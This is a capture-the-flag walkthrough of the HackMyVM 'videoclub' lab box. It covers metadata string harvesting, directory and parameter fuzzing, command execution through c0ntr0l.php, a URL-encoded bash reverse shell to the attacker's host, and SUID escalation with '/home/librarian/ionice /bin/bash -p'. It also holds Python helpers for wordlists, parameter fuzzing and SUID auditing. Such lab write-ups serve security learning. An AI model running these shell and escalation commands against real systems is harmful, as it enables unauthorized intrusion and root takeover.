Hackmyvm target series (6) -videoclub
2022-07-06 13:58:00 【The moon should know my meaning】
1. Information gathering
Because this is the campus network and there are far too many hosts, I grep the host-discovery output for a keyword to find the target directly: the lab VM runs in VirtualBox, so the "VirtualBox" MAC vendor string that nmap prints for hosts on the same segment gives it away (-B 2 pulls in the host line above it). Note that -sP is the old spelling of -sn (ping scan, no port scan), and MAC vendor lines only appear when scanning as root on the local L2 segment.
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Then port-scan the target with nmap to find what it exposes. As the screenshot shows, an SSH service and an HTTP service are open.
nmap -sV -sC -p- -sT 192.168.200.161
Browse to port 3377.
The page looked like a CMS, so I ran whatweb to fingerprint it.
whatweb http://192.168.200.161:3377
It did not identify any known CMS, though.
So, directory scanning first.
gobuster dir -u http://192.168.200.161:3377 -w directory-list-2.3-medium.txt -x php,html,txt,7z,zip,bak,gz
It turned up quite a lot; visit the results one by one.
One of them is a directory listing (Apache directory indexing, not a traversal bug) full of images.
There is a similar listing for the videos.
And the default Apache user manual.
robots.txt contains a long string of characters at the bottom. At first I took it for base64, but decoding it only produced garbage.
robots.txt also hides a file name at the very bottom of the page.
Visiting list-defaulters.txt shows the following. I could not see the point at first, but on a careful second look the items I have circled below look odd in combination.
Readers of my earlier posts already know what exiftool is:
ExifTool, developed by Phil Harvey, is free, cross-platform open-source software for reading, writing and editing the metadata of files, mainly images, but also audio, video and PDF.
"steg hide" presumably refers to steghide, the steganography tool, i.e. a hint that something is hidden inside these files?
2. Exploitation
Use exiftool to read the images' metadata. hackers.jpg is the most suspicious, so start with that one.
As shown in the figure, one string immediately stands out as suspicious, so next check whether the other images and videos also carry a Copyright field.
I wrote a Python script to pull down every image on the target.
To crawl the videos, just change images to videos.
import requests
from bs4 import BeautifulSoup

# Apache directory listing to crawl; change images to videos for the video listing
BASE = 'http://192.168.200.161:3377/images/'

resp = requests.get(BASE)
soup = BeautifulSoup(resp.text, 'lxml')
links = [BASE + a['href'] for a in soup.find_all('a', href=True)]
# drop the column-sort links (?C=N;O=D ...) and the parent-directory link (href="/")
file_urls = [u for u in links if '?' not in u and u != BASE + '/']

for url in file_urls:
    print(url)
    data = requests.get(url).content
    # save each file under its own name in the current directory
    with open(url.split('/')[-1], 'wb') as f:
        f.write(data)
In the end, the following strings were collected from all the images and videos.
images:
zerial_killer:bien_cabron
videos:
LostDVD:k1nd3rs
LostDVD=t3rm1n4t0r
LostDVD=m14_w4ll4c3
LostDVD=c0n3h34ds
secret_film:c0ntr0l
At first I assumed these were account and password pairs and tried logging in with each of them. Unsurprisingly, they all failed.
So instead I combined them with the entries from list-defaulters.txt into a wordlist, as shown in the figure below.
Then run dirsearch with that wordlist as the dictionary.
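The wordlist-building step, as an added example (this is not the author's script; it is mine). It reads the Copyright tag of every downloaded file with exiftool's JSON output, then splits each harvested string on the `:` or `=` separator so that both halves and the full string go into dict.txt, and adds the bare words from list-defaulters.txt. The sample values are the ones collected above; the list-defaulters.txt text is a constructed stand-in, since the page only shows it as a screenshot.

```python
"""Build dict.txt from harvested Copyright strings plus list-defaulters.txt (added example)."""
import json
import re
import subprocess


def read_copyright_tags(paths):
    """Run `exiftool -j -Copyright` over the files and return {file: copyright string}.
    Files without a Copyright tag are skipped; returns {} if exiftool is not installed."""
    try:
        out = subprocess.run(["exiftool", "-j", "-Copyright", *paths],
                             capture_output=True, text=True, check=False).stdout
    except FileNotFoundError:
        return {}
    return {e["SourceFile"]: e["Copyright"] for e in json.loads(out or "[]") if "Copyright" in e}


def split_pair(s):
    """'LostDVD=k1nd3rs' -> ('LostDVD', 'k1nd3rs'); a string with no separator -> (s, None)."""
    m = re.fullmatch(r"([^:=]+)[:=](.+)", s.strip())
    return (m.group(1), m.group(2)) if m else (s.strip(), None)


def build_wordlist(copyright_values, defaulters_text):
    """Full strings, both halves of each pair, and every 3+ char word from the defaulters file."""
    words = set()
    for v in copyright_values:
        left, right = split_pair(v)
        words.update(w for w in (v.strip(), left, right) if w)
    words.update(re.findall(r"[A-Za-z0-9_]{3,}", defaulters_text))
    return sorted(words)


# Strings collected from the images and videos on the page
HARVESTED = ["zerial_killer:bien_cabron", "LostDVD:k1nd3rs", "LostDVD=t3rm1n4t0r",
             "LostDVD=m14_w4ll4c3", "LostDVD=c0n3h34ds", "secret_film:c0ntr0l"]
# Constructed stand-in for list-defaulters.txt (assumption: the real file is not reproduced here)
DEFAULTERS_SAMPLE = "overdue rentals:\nsteg hide\n"

if __name__ == "__main__":
    import glob
    tags = read_copyright_tags(glob.glob("*.jpg") + glob.glob("*.mp4"))  # whatever was downloaded
    values = list(tags.values()) or HARVESTED
    with open("dict.txt", "w") as f:
        f.write("\n".join(build_wordlist(values, DEFAULTERS_SAMPLE)) + "\n")
```

Splitting on both `:` and `=` matters here because the page's own samples mix the two separators; a wordlist that only kept the full strings would never contain c0ntr0l on its own.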
dirsearch -u "http://192.168.200.161:3377/" -t 50 -e php,html,txt,7z,zip,gz,bak -x404,500,599 -w /home/kali/Desktop/video/dict.txt
The scan results are as follows.
Then run another directory scan with gobuster.
gobuster dir -u "http://192.168.200.161:3377/" -t 30 -x php,html,txt,7z,zip,gz,bak -w dict.txt
The results are as follows: gobuster finds one more file than dirsearch, c0ntr0l.php.
Same wordlist, yet dirsearch missed one entry, and this step held me up for a long time. From now on I will always run two different scanners for directory brute-forcing; when their results disagree, compare how each one filters responses.
Visit the results one by one. Everything else is either video or images, nothing of value.
Only c0ntr0l.php returns a blank page. That feels promising!
http://192.168.200.161:3377/c0ntr0l.php
The request does not seem to take any parameters, so fuzz the parameter name with wfuzz and see whether there is a surprise.
Use the wordlist we collected earlier as the dictionary!
wfuzz -c --hc=404 -t 500 -w dict.txt http://192.168.200.161:3377/c0ntr0l.php?FUZZ=id
In the results, the flynn parameter produces a response that differs from all the others.
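What wfuzz is doing above, written out as an added example (my code, not the author's or a wfuzz feature): request ?NAME=id for every NAME in the wordlist, reduce each response to (status, length, body hash), and report the names whose signature differs from the most common one. The target URL is the page's c0ntr0l.php; the live request loop only runs under the `__main__` guard, and the signature dictionary used in the test is constructed.

```python
"""GET-parameter name discovery by response diffing (added example)."""
import hashlib
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter


def fetch_signature(base_url, name, value="id", timeout=5):
    """Return (status, body length, sha1 of body) for base_url?name=value.
    HTTP error responses are kept as signatures too; a 500 can be just as telling as a 200."""
    url = f"{base_url}?{urllib.parse.urlencode({name: value})}"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            status, body = resp.status, resp.read()
    except urllib.error.HTTPError as e:
        status, body = e.code, e.read()
    return (status, len(body), hashlib.sha1(body).hexdigest())


def find_outliers(signatures):
    """signatures: {param_name: (status, length, hash)}.
    The baseline is the most common signature (the 'parameter ignored' response);
    any name that produced something else is worth a manual look."""
    if not signatures:
        return []
    baseline = Counter(signatures.values()).most_common(1)[0][0]
    return sorted(name for name, sig in signatures.items() if sig != baseline)


def fuzz_params(base_url, names, value="id"):
    """Probe every candidate name and return the outliers."""
    return find_outliers({n: fetch_signature(base_url, n, value) for n in names})


if __name__ == "__main__":
    # Assumptions: dict.txt is the wordlist built earlier and the target is the page's URL
    with open("dict.txt") as f:
        candidates = [line.strip() for line in f if line.strip()]
    print(fuzz_params("http://192.168.200.161:3377/c0ntr0l.php", candidates))
```

Hashing the body rather than only comparing lengths catches the case where a parameter changes the content without changing its size; with a very small wordlist where no signature repeats, the baseline is arbitrary and everything looks like an outlier, so always sanity-check by hand as the author does next.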
Visit http://192.168.200.161:3377/c0ntr0l.php?flynn=id
?? It actually executes commands. So why not go straight for a reverse shell?
Listen on port 6666 on kali.
Then use HackBar to request the following (the URL-encoded payload is bash -c 'bash -i >& /dev/tcp/192.168.200.192/6666 0>&1'):
http://192.168.200.161:3377/c0ntr0l.php?f1ynn=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.200.192%2F6666%200%3E%261'
Back on kali the reverse shell connects, but only with the privileges of the web user.
3. Privilege escalation
Looking at /home there are two directories, and secret_film looks familiar: it appears in the strings collected from the images and videos above. Try logging in with it.
Uh..... login failed. Something is off here: why is the owner of the secret_film directory root?
Checking /etc/passwd makes it clear: there is no secret_film user at all. This box is full of traps!
The home directory of the librarian user is readable and accessible by any user.
What is in it?
There is the flag, and any user can read it directly. First flag obtained.
There is also an executable with the s (setuid) bit set, owned by root. Could this be a SUID privilege escalation?
Run the following to list every file with the SUID bit:
find / -perm -u=s -type f 2>/dev/null
Be careful not to type
ionice /bin/sh -p when escalating, or you will end up as www-data again like I did. which ionice shows that the bare command resolves to /usr/bin/ionice, and that file does not have the s bit.
You need the absolute path of the SUID copy for the escalation to succeed (-p stops bash from dropping the effective uid).
/home/librarian/ionice /bin/bash -p
Change to /root. root.txt is not there, but there is a note-for-new-administrator file; its contents say that root.txt has been moved.
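The SUID hunt and the PATH pitfall from the steps above, as an added example (my code, not part of the original walkthrough). It enumerates SUID regular files like the find command, flags any that live outside the standard system binary directories (a root-owned copy in a user's home is exactly the librarian/ionice situation), and for a given command name shows where PATH resolves it, whether that copy is SUID, and where other SUID copies of the same name sit. Run it as the low-privilege shell user; the temporary files in the usage are constructed.

```python
"""Enumerate SUID binaries and compare them with what PATH resolves (added example)."""
import os
import pwd
import shutil
import stat

# Directories where package-managed SUID binaries normally live
STANDARD_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")


def has_suid_bit(path):
    """True if path is a regular file (symlinks not followed) with the SUID bit set."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def classify_suid_path(path):
    """'standard' for the usual system directories, otherwise 'suspicious'."""
    return "standard" if path.startswith(STANDARD_DIRS) else "suspicious"


def owner_name(uid):
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)


def suid_audit(root="/"):
    """Return [(classification, owner, path)] for every SUID regular file below root,
    the Python equivalent of: find / -perm -u=s -type f 2>/dev/null"""
    hits = []
    for dirpath, _dirs, files in os.walk(root):  # unreadable dirs are skipped silently
        for fn in files:
            p = os.path.join(dirpath, fn)
            if has_suid_bit(p):
                hits.append((classify_suid_path(p), owner_name(os.lstat(p).st_uid), p))
    return hits


def which_vs_suid(name, root="/"):
    """Where does `name` resolve on PATH, is that copy SUID, and are there SUID copies elsewhere?"""
    on_path = shutil.which(name)
    elsewhere = [p for _, _, p in suid_audit(root)
                 if os.path.basename(p) == name and p != on_path]
    return {"on_path": on_path,
            "path_copy_is_suid": has_suid_bit(on_path) if on_path else False,
            "suid_copies_elsewhere": elsewhere}


if __name__ == "__main__":
    for kind, owner, path in suid_audit("/"):
        print(f"{kind:<10} {owner:<10} {path}")
    print(which_vs_suid("ionice"))  # on this box: PATH copy not SUID, /home/librarian/ionice is
```

The "suspicious" classification is a heuristic for triage, not proof of anything: a SUID file under /home or /opt is simply something a defender should be able to explain, and something an attacker should try with its absolute path rather than via PATH.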
Use find to locate root.txt directly.
find / -name root.txt